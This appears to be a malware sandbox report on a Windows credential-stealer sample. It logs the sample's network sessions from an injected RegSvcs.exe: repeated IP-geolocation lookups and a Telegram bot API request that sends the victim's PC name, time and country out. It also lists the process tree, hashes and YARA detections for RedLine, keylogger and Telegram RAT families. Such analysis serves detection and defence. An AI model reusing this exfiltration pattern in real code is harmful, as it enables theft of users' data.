                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:29 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:29 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:29 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863859
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTUD6H43PQ1RznvqJ2xRat6pNKKzyce5aE%2FgLL%2FR3n6OVQs3K6xoMxShAB3fau1Uf%2B5PUhRuFfAwYYYZfxYK2rBEe19jVjMbL6fdjBk9Cw%2BDKcIaGZB0gHjZsNjtCWRGzEXtBfbg"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90003126ffe141ba-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1748502&cwnd=192&unsent_bytes=0&cid=6b22a1a118f250bf&ts=131&x=0"
                                                                                                                          2025-01-10 22:44:29 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          13 | 192.168.2.4 | 49761 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:31 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:31 UTC | 867 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:31 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863860
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oVmla1G%2FF1K87cc8F0JVmh0DiIh9sqldapP9KOY%2F7ZZk%2FEc%2FXGs5jZvAr6WlmSb9W9k0R8cvjaWwfvQI6Iw70ftpu8J7xBLp%2BK%2BsBDPz548GS6Rv4%2FT5dem%2BVM%2BIYNh0okPmZco"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000312e8a177293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2023&rtt_var=782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1379962&cwnd=158&unsent_bytes=0&cid=5b7e6b655267e371&ts=168&x=0"
                                                                                                                          2025-01-10 22:44:31 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          14 | 192.168.2.4 | 49763 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:32 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:32 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:32 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863861
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdeL%2Fri3tT5q9BXxkMSqBegD4bDBKlz35rRSG5gAZNjppFHnrmdhHNh6hvRCNx1wZDeobeNTLF50Av%2F9W0HVmnlPLGrTiYfTvPsMb5IvjWnTyglymNmVVnLcZPpEsDWLTX78CC5%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90003136cdb64388-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1599&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1795817&cwnd=221&unsent_bytes=0&cid=64a396124afce75f&ts=277&x=0"
                                                                                                                          2025-01-10 22:44:32 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          15 | 192.168.2.4 | 49765 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:33 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:33 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863862
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKQ8DfVA57HGgN9Zhu4sfjYWce68Jwcd59QR6WxDs5aiLjGX%2BwWc7wtZjyZF4CWGy6Hy6Ys%2B9lPH7LozYdJxeFP4bFHaajQv1srnuuuMbwYPyTFqjBnUDddcTz2JK%2Bc2exr9V3bk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000313e2d1e7293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1890&min_rtt=1882&rtt_var=722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1498973&cwnd=158&unsent_bytes=0&cid=7e15505c911ceccd&ts=145&x=0"
                                                                                                                          2025-01-10 22:44:33 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          16 | 192.168.2.4 | 49767 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:34 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:34 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863864
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OleVjBjM2AHkK18fMtt0AwriPNObSQbv%2FX7USXTA%2BvAVFCQCqZmgbAK850WQjtBRpSOHR%2FTlHv0IK1xh5HbQ%2FpLbDoum%2BEMYYtDvs1tJNoT64iJySg9NlqcF41A%2FOwHBNJt35u4e"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90003145ee7c8ce0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1804&rtt_var=698&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1544973&cwnd=215&unsent_bytes=0&cid=5092d2db4cb4b231&ts=164&x=0"
                                                                                                                          2025-01-10 22:44:34 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          17 | 192.168.2.4 | 49769 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2025-01-10 22:44:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:36 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863865
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfJfKxpKOg%2BqwrIYNWY5b9qYaV2SH6UKLPL8pDPxm90n6IQbq0AYwN2NzaFGsmJ3IiCAx4lBnO3skN%2B3SVWuGpwlGvfVtvQ2QK73hLXrvy%2F%2FIFLRlZXTX3v7GzERk5WAlcpDrHLp"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000314d8ca441ba-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1699&rtt_var=650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1667618&cwnd=192&unsent_bytes=0&cid=9c64f4cbeda6322e&ts=146&x=0"
                                                                                                                          2025-01-10 22:44:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49771 | 104.21.16.1 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:37 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-10 22:44:37 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 22:44:37 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1863866
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgH2vb0z7NPqnDx40b84bizIKDfnE1U0biopg%2FVl1moDu%2FuStbJCgKc3tNcdKCzV9OBmLkXDMNV8mQfMHHSse%2FCiN7JPm1lQ3PHfaEGOkJqWK0XGakgY2Pw8%2B5ddv%2BL4QR9Pfr8j"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9000315538f20fa8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1475&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1922317&cwnd=252&unsent_bytes=0&cid=4431cee8fccef106&ts=135&x=0"
2025-01-10 22:44:37 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49772 | 149.154.167.220 | 443 | 7924 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:44:38 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-10 22:44:38 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:44:38 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:44:38 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 17:44:02
Start date: 10/01/2025
Path: C:\Users\user\Desktop\3i1gMM8K4z.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\3i1gMM8K4z.exe"
Imagebase: 0xee0000
File size: 1'147'904 bytes
MD5 hash: 1D0C53E42BD84B7B7CFABED7DAE7F570
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 17:44:05
Start date: 10/01/2025
Path: C:\Users\user\AppData\Local\Okeghem\ghauts.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\3i1gMM8K4z.exe"
Imagebase: 0x590000
File size: 1'147'904 bytes
MD5 hash: 1D0C53E42BD84B7B7CFABED7DAE7F570
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.1769744228.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 66%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 17:44:09
Start date: 10/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\3i1gMM8K4z.exe"
Imagebase: 0xaf0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
